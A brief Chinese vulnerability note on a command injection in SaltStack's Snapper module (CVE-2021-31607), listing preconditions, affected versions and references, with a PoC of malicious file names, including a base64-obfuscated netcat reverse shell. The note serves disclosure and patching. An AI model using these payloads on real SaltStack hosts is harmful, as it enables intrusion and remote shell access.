# SaltStack命令注入漏洞（CVE-2021-31607）

在SaltStack的Snapper模块中存在命令注入漏洞，当master请求minion的diff时，minion会使用popen执行file命令判断目录下文件是否为文本文件，将文件名作为参数传递给file，当文件名包含恶意命令时可能导致命令注入漏洞，导致系统执行恶意命令。

利用条件：

1. master开启Snapper.diff模块
2. minion内存在有恶意文件名的文件

影响版本：

saltstack 2016.9 到3002.6

PoC：


```
echo hi > '$(touch HACKED).txt'
反弹shell：
echo hi > '$(echo bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMSA0NDQ0|base64 -d|sh -i).txt'
```

ref：

* https://sec.stealthcopter.com/saltstack-snapper-minion-privledge-escaltion/
* https://nvd.nist.gov/vuln/detail/CVE-2021-31607
* https://nox.qianxin.com/vulnerability/detail/97347